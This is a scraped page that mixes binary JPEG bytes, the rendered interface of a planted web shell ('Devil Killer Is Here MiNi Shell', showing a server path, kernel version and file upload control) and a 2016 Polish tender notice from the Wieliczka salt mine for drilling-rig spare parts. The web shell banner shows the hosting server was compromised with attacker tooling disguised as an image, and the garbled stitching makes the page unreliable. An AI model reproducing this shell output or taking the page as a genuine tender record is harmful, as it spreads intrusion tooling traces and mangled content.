JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20160415/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20160415/42257-N-2016.html

<p class="kh_header"><b>Wieliczka: Dostawa części zamiennych oraz osprzętu do  wiertnicy MDR-06A</b><br>
<b>Numer ogłoszenia: 42257 - 2016; data zamieszczenia: 15.04.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Kopalnia Soli "Wieliczka" Spółka Akcyjna , Park Kingi 1, 32-020 Wieliczka, woj. małopolskie, tel. 12 2787111, 12 2787132, faks 12 2787110.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.kopalniawieliczka.eu</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: Spółka Akcyjna - Górnictwo.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa części zamiennych oraz osprzętu do  wiertnicy MDR-06A.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiot zamówienia
1.1.	Przedmiotem zamówienia jest zakup wraz z dostawą części zamiennych oraz osprzętu do wiertnicy MDR-06A, których rodzaj oraz maksymalne ilości zawiera poniższa tabela:
WIERTNICA MDR - 06A                          
L.P.- GŁOWICA ZACISKOWA-ILOŚĆ-JM.-NORMA/Nr kat.-Pozycja 
z rysunku
1-POKRYWA GÓRNA-6-SZT-N15-5B-2b-150
2-TARCZA REGULACYJNA -6-SZT-G51.005-03.012d-151
3-TULEJA PROWADZĄCA SZCZĘKI -4-SZT-N15-5B-8a-153
4-CYLINDER-2-SZT-N15-5B-1b-154
5-TŁOK-4-SZT-N15-5B-7-155
6-PROWADNICA SZCZĘK-4-SZT-N15-5B-6-156
7-TULEJA POŚREDNIA-2-SZT-N15-5B-4-159
8-POKRYWA DOLNA-2-SZT-N15-5B-3b-161
9-ODRZUTNIK-5-SZT-N15-5B-16-162
10-SZCZĘKA DLA ŻERDZI fi42-120-SZT-N15-5B-15-163
11-WRZECIONO-4-SZT-N15-5B-11-167
12-TULEJA PROWADZĄCA-5-SZT-N15-20B20a-168
L.P.-CYLINDRY DOCISKOWE-ILOŚĆ-JM.-NORMA/Nr kat.-Pozycja 
z rysunku
-----
1-PRZEWÓD-10-SZT-N15-5c-5a-220
2-KOSTKA ROZDZIELCZA-10-SZT-N15-5c-2a-221
3-PRZEWÓD-10-SZT-N15-5C-3a-222
4-PRZEWÓD-10-SZT-N15-5C-4a-223
5-WKŁADKA-10-SZT-C-50.18-250
6-TŁOCZYSKO-20-SZT-C-50.04/A-251
7-TŁOK-10-SZT-C-50.16-253
8-TULEJA CYLINDRA-10-SZT-C-50.05/AM-258
9-TULEJA PROWADZĄCA-10-SZT-C-50.02-260
10-POKRYWA-10-SZT-C-50.01-261
L.P.-SKRZYNIA PRZEKŁADNIOWA -ILOŚĆ-JM.-NORMA/Nr kat.-Pozycja 
z rysunku
1-KADŁUB SKRZYNI PRZEKŁADNIOWEJ-2-SZT-G15-20A1d-1
2-KADŁUB GŁOWICY (OBROTNICY)-2-SZT-G15-20A2d-2
3-KADŁUB POŚREDNI-5-SZT-G15-20A3d-3
4-POŁÓWKA OBEJMY-4-SZT-G15-20A4c-4
5-POKRYWA-5-SZT-G15-20A5c-5
6-WAŁEK ZĘBATY-8-SZT-G15-20A7c-7
7-WAŁEK ZĘBATY-8-SZT-G15-20A8e-8
8-WAŁEK -8-SZT-N15-20A9-9
9-WAŁEK-10-SZT-G15-20A10c-10
10-POKRYWA-5-SZT-G15-20A6c-6
11-TULEJA-10-SZT-N15-20A11-11
12-WAŁEK-8-SZT-G15-20A12c-12
13-WAŁEK-8-SZT-N15-20A13-13
14-WAŁEK-8-SZT-G15-20A14c-14
15-KOŁO ZĘBATE ZEW. m=3, z=37   WEW. m=2, z=25-8-SZT-G15-20A15c-15
16-KOŁO ZĘBATE m=3, z=27  i m=2, z=25-8-SZT-G15-20A16c-16
17-KOŁO ZĘBATE m=3, z=17-8-SZT-G15-20A17c-17
18-KOŁO ZĘBATE STOŻKOWE m=4, z=49-15-SZT-G15-20A18d-18
19-KOŁO ZĘBATE STOŻKOWE m=4, z=20-15-SZT-G15-20A19d-19
20-KOŁO ZĘBATE m=3, z=37-8-SZT-G15-20A20c-20
21-KOŁO ZĘBATE m=3, z=27, m=2, z=25-8-SZT-G15-20A21c-21
22-KOŁO ZĘBATE m=3, z=22-8-SZT-G15-20A22c-22
23-POKRYWA-8-SZT-G15-20A23c-23
24-POKRYWA-8-SZT-G15-20A24c-24
25-TULEJKA-10-SZT-G15-20A25c-25
26-PIERŚCIEŃ-10-SZT-G15-20A26c-26
27-PIERŚCIEŃ DZIELONY-20-SZT-G15-20A27c-27
28-POKRYWA-8-SZT-G15-20A28c-28
29-PIERŚCIEŃ ODLEGŁOŚCIOWY-10-SZT-G15-20A29c-29
30-PIERŚCIEŃ ODLEGŁOŚCIOWY-10-SZT-G15-20A30c-30
31-TULEJKA ODLEGŁOŚCIOWA-5-SZT-G15-20A31c-31
32-POKRYWA-5-SZT-G15-20A32c-32
33-PIERŚCIEŃ-10-SZT-N15-20A33-33
34-PODKŁADKA REGULACYJNA-10-SZT-G15-20A34c-34
35-GNIAZDO ŁOŻYSKA-10-SZT-G15-20A35c-35
36-TULEJA ODLEGŁOŚCIOWA-5-SZT-G15-20A36c-36
37-KOŁNIERZ-5-SZT-G15-20A37c-37
38-PODKŁADKA REGULACYJNA-10-SZT-G15-20A39c-39
39-POKRYWA-5-SZT-N15-20A40-40
40-OBEJMA-2-SZT-N15-20A41-41
41-DŹWIGNIA-10-SZT-N15-20A42-42
42-WIDEŁKI-10-SZT-G15-20A43c-43
43-WODZIK-10-SZT-G15-20A45d-45
L.P-CZĘŚCI SPECJALNE-ILOŚĆ-JM.-NORMA/Nr kat.-Pozycja z rysunk
1-KORPUS PRZYŁĄCZKI 16-10-20-SZT-PN-65/M-73140*-230
2-KORPUS PRZYŁĄCZKI KOLANKOWEJ 16-10-20-SZT-PN-65/M-73142-232
3-PRZECIWNAKRĘTKA M16 X 1,5 -40-SZT-PN-65/M-73109*-233
4-FILTR SIATKOWY WS-1-40SM-5-SZT-KAT.WSK WROCŁAW-454
5-PRZEWÓD 10 X 2240-20-SZT-N15-20F6C/3-460
6-PRZEWÓD 10 X 500-20-SZT-N15-20F5C-461
7-PRZEWÓD RUROWY-10-SZT-N15-20F1a-462
8-PRZEWÓD RUROWY-10-SZT-N15-20F3a-463
9-PRZEWÓD 10 X 1600-20-SZT-N15-20F6C/1-464
10-PRZEWÓD RUROWY-10-SZT-N15-20F2a-465
11-PRZEWÓD RUROWY-10-SZT-N15-20F4a-466
12-PRZEWÓD 10 X 1800-20-SZT-N15-20F6c/2-468
13-ŚRUBA SPECJALNA -6-SZT-N15-20F20a-469
14-PRZEWÓD RUROWY-10-SZT-N15-20F19a-470
15-BLACHA MOCUJĄCA-5-SZT-N15-20F10a-471
16-ROZDZIELACZ RBS10-160-PxZ5xZ5xZ5xL-8-SZT-KAT.WSK WROCŁAW-476
17-ZAWÓR PRZELEWOWY ZP1-160-10-8-SZT-KAT.WSK WROCŁAW-477
18-KORPUS PRZYŁĄCZKI KOLANKOWEJ B16-16/10-20-SZT-ZM-0105-31-483
19-PRZECIWNAKRĘTKA M22 X 1,5-20-SZT-PN-65/M-73109*-484
20-ZAWÓR DŁAWIĄCY ZDZ1-320R10-20-SZT-KAT.WSK POZNAŃ-487
21-POMPA ZĘBATA P-503-5-SZT-KAT.WSK POZNAŃ-488
L.P-GŁOWICA PŁUCZKOWA-ILOŚĆ-JM.-NORMA/Nr kat.-Pozycja z rysunku
1-GŁOWICA-10-SZT-ZM-N15-23H1-700
2-PIERŚCIEŃ PODPOROWY-10-SZT-ZM-N15-23H6a-701
3-PIERŚCIEŃ DOCISKOWY -10-SZT-ZM-N15-23HA7-702
4-PIERŚCIEŃ DYSTANSOWY-10-SZT-ZM-N15-23HA14-703
5-PIERŚCIEŃ DYSTANSOWY-10-SZT-ZM-N15-23HA15-704
6-OPRAWA-10-SZT-ZM-N15-23HA2-706
7-WRZECIONO-10-SZT-ZM-N15-23HA4-707
8-PODKŁADKA-10-SZT-ZM-N15-23H11-708
9-ŁĄCZNIK-10-SZT-ZM-N15-23H11/1A-709
L.P-OSPRZĘT WIERTNICZY-ILOŚĆ-JM.-NORMA/Nr kat.-Pozycja ze strony kat.
1-RDZEŃIÓWKA POJEDYŃCZA fi 76 mm dł. 2.0 mb PB-5-SZT-N76-1001-000-34
2-KORONKA SŁUPKOWA POJEDYŃCZA fi 76 mm P-20-SZT-ZM 76-0007-000A-40
3-ŁĄCZNIK FI 42 Cr-620-SZT-ZM 2106-07/1-48
4-ŻERDŹ FI 42 Cr L-0,5m. NIE SPĘCZANA -620-SZT-ZM2103-07/1A-48

1.2.	Oznaczenie dla poszczególnych części zamiennych do wiertnicy MDR-06A oraz osprzętu określają rysunki, które stanowią załącznik nr 1 do specyfikacji.
1.3.	W ramach maksymalnych ilości, określonych w pkt 1 ppkt 1.1, Zamawiający zobowiązuje się do zakupu części zamiennych  do wiertnicy MDR-06A oraz osprzętu o wartości 60% ceny całkowitej brutto podanej w ofercie. Zakup pozostałej ilości części zamiennych  do wiertnicy MDR-06A oraz osprzętu o wartości 40% ceny całkowitej brutto podanej w ofercie, zależeć będzie od potrzeb Zamawiającego (prawo opcji).

2.	Sposób przeprowadzenia dostawy:
2.1. 	Przedmiot zamówienia będzie dostarczony przez Wykonawcę na zlecenie Zamawiającego sukcesywnie, partiami, w ciągu okresu trwania umowy.
2.2.	Jednostkowe dostawy muszą posiadać:
a)	dowód wydania na zewnątrz WZ lub fakturę VAT,
b)	świadectwo jakości,
c)	dokument potwierdzający zgodność wyrobu z odpowiednią normą wskazaną  w tabeli określonej w pkt 1 ppkt 1.1.
2.3.	Dostawa będzie następowała w terminach i ilościach określonych w zleceniach składanych przez Zamawiającego w formie faksu i telefonicznie. 
2.4.	Wykonawca jest zobowiązany do dostarczenia przedmiotu zamówienia objętego zleceniem, o którym mowa w pkt 2.1, w terminie do 14 dni, licząc od daty przekazania Wykonawcy tego zlecenia.
2.5.	Przewiduje się dostawy przedmiotu zamówienia w maksymalnie 40 partiach w okresie obowiązywania umowy.
2.6.	Miejscem dostarczania części zamiennych do wiertnicy MDR-06A oraz osprzętu jest Kopalnia Soli Wieliczka S.A., 32-020 Wieliczka, Park Kingi 1. Dostawa odbywać się będzie w dni robocze w godz. 7.00 - 12.00.
2.7.	O przygotowaniu zleconej dostawy przedmiotu zamówienia, Wykonawca jest obowiązany powiadomić Zamawiającego telefonicznie i faksem, nie później niż na 1 dzień roboczy przed wymaganym terminem dostawy.
2.8.	Strony zgodnie oświadczają, że własność poszczególnych partii dostarczonych części zamiennych do wiertnicy MDR-06A oraz osprzętu, przechodzi na Zamawiającego w momencie ich prawidłowego odbioru stwierdzonego w sposób określony w § 6 wzoru umowy.
2.9.	Transport będzie dokonywany przez Wykonawcę na jego koszt i ryzyko.

Szczegółowe informacje dotyczące przedmiotu zamówienia i zasad jego realizacji zawarte zostały we wzorze umowy stanowiącym załącznik nr 7 do SIWZ, zamieszczonej na stronie internetowej Zamawiającego 
www.kopalniawieliczka.eu.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 43.13.22.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 18.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 1.	Wadium w wysokości: 10 000,00 złotych należy wnieść przed upływem terminu składania ofert, określonym w części XIV pkt 2 SIWZ.
2.	Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy:
Bank Pekao Spółka Akcyjna Oddział w Wieliczce
Konto: 75124047481111000048778501 
z dopiskiem: wadium w sprawie KSW/2016/EL/11
Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego.
Nie dopuszcza się wpłaty wadium w kasie Kopalni Soli Wieliczka S.A.
3.	Wadium wniesione w innej formie niż forma pieniężna (zgodnie z przepisami ustawy Prawo zamówień publicznych) winno być złożone w Sekretariacie Kopalni Soli Wieliczka S.A. przed upływem terminu składania ofert określonym w części XIV pkt 2 SIWZ.
4.	Zamawiający dokona zwrotu wadium zgodnie z art. 46 ustawy Prawo zamówień publicznych.
5.	Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi 
na wezwanie, o którym mowa w art. 26 ust. 3 ustawy Prawo zamówień publicznych, 
z przyczyn leżących po jego stronie, nie złożył dokumentów lub oświadczeń, o których mowa 
w art. 25 ust. 1 ww. ustawy, pełnomocnictw, listy podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, lub informacji o tym, że nie należy do grupy kapitałowej, lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3, 
co powodowało brak możliwości wybrania oferty złożonej przez Wykonawcę jako najkorzystniejszej.
6.	Zgodnie z art. 46 ust 5 ustawy Pzp, Zamawiający zatrzymuje wadium wraz  z odsetkami, jeżeli Wykonawca, którego oferta została wybrana :
1)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych 
w ofercie,
2)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
3)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy.
7.	Wykonawca, który nie wniesie wymaganego wadium do upływu terminu składania ofert, 
na przedłużony okres związania ofertą lub w terminie, o którym mowa w art. 46 ust. 3 ustawy Prawo zamówień publicznych albo nie zgodzi się na przedłużenie okresu związania ofertą zostanie wykluczony z postępowania o udzielenie zamówienia publicznego na podstawie art. 24 ust. 2 pkt 2 ustawy - Prawo zamówień publicznych.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>udokumentowanie należytego wykonania, w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej jednej dostawy mającej za przedmiot dostawę części zamiennych do wiertnic o wartości nie mniejszej niż 200 000,00 zł (brutto), wraz z podaniem jej wartości, przedmiotu, daty wykonania i podmiotu, na rzecz którego dostawa została wykonana oraz załączeniem dowodów, czy została wykonana należycie</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1.Zgodnie z przepisem art. 144 ust. 1 ustawy Prawo zamówień publicznych, dopuszcza
 się możliwość dokonania istotnych zmian postanowień umowy oraz załączników
do umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy w zakresie, o którym mowa w pkt 2, z wyłączeniem takich zmian, których dokonanie spowodowałoby rozszerzenie przedmiotu umowy poza zakres przedmiotowy oferty, na podstawie której dokonano wyboru Wykonawcy.
2.	Dopuszcza się możliwość dokonania istotnych zmian postanowień niniejszej umowy
oraz załączników do umowy, w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w tym między innymi w zakresie przedmiotu umowy, terminu realizacji umowy oraz wysokości należnego Wykonawcy wynagrodzenia, w przypadku zaistnienia którejkolwiek z poniższych przyczyn:
1)	przestojów i opóźnień w wykonywaniu przedmiotu umowy, zawinionych przez Zamawiającego,
2)	działania siły wyższej,
3)	zaistnienia okoliczności niemożliwych do przewidzenia w chwili zawarcia umowy.
3.	W przypadku niedokonania przez Zamawiającego zakupu części zamiennych oraz osprzętu do wiertnicy MDR-06A o wartości 60% maksymalnego wynagrodzenia brutto określonego w § 5 ust. 1 wzoru umowy, dopuszcza się możliwość jednokrotnego przedłużenia okresu obowiązywania umowy, o którym mowa w § 4 ust. 1 wzoru umowy, o okres do 6 miesięcy.
4.	Zaistnienie przyczyn, wymienionych w pkt 2 lub pkt 3 nie powoduje powstania u żadnej ze stron niniejszej umowy, roszczenia o zmianę umowy.
5.	W przypadku zaistnienia, którejkolwiek z przyczyn, wymienionych w pkt 2, każdej ze stron niniejszej umowy przysługuje prawo do wystąpienia do drugiej strony o zmianę niniejszej umowy. Wystąpienie o dokonanie zmiany winno zawierać:
1)	szczegółowy opis przyczyn uzasadniających zmianę umowy, 
2)	uzasadnienie dokonania zmiany umowy,
3)	projekt zmiany umowy.
6.	Wystąpienie, o którym mowa w pkt 5 stanowi podstawę do podjęcia negocjacji w sprawie zmiany umowy.
7.	Zmiana umowy oraz załączników do umowy wymaga zachowania formy pisemnej pod rygorem nieważności.
8.	Zmian umowy dokonuje się w formie aneksów, którym nadaje się kolejne numery.
9.	Zmiana umowy zostaje zawarta w dniu jej podpisania przez obie strony.
10.	Przepisy zawarte w powyższych ustępach, nie wykluczają dokonania nieistotnych zmian postanowień niniejszej umowy, w rozumieniu art. 144 ustawy Prawo zamówień publicznych a w szczególności dotyczących zmiany nazw stron, danych teleadresowych, itp. Do nieistotnych zmian postanowień niniejszej umowy przepisy ust. 4-8 stosuje się odpowiednio</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.kopalniawieliczka.eu<br>
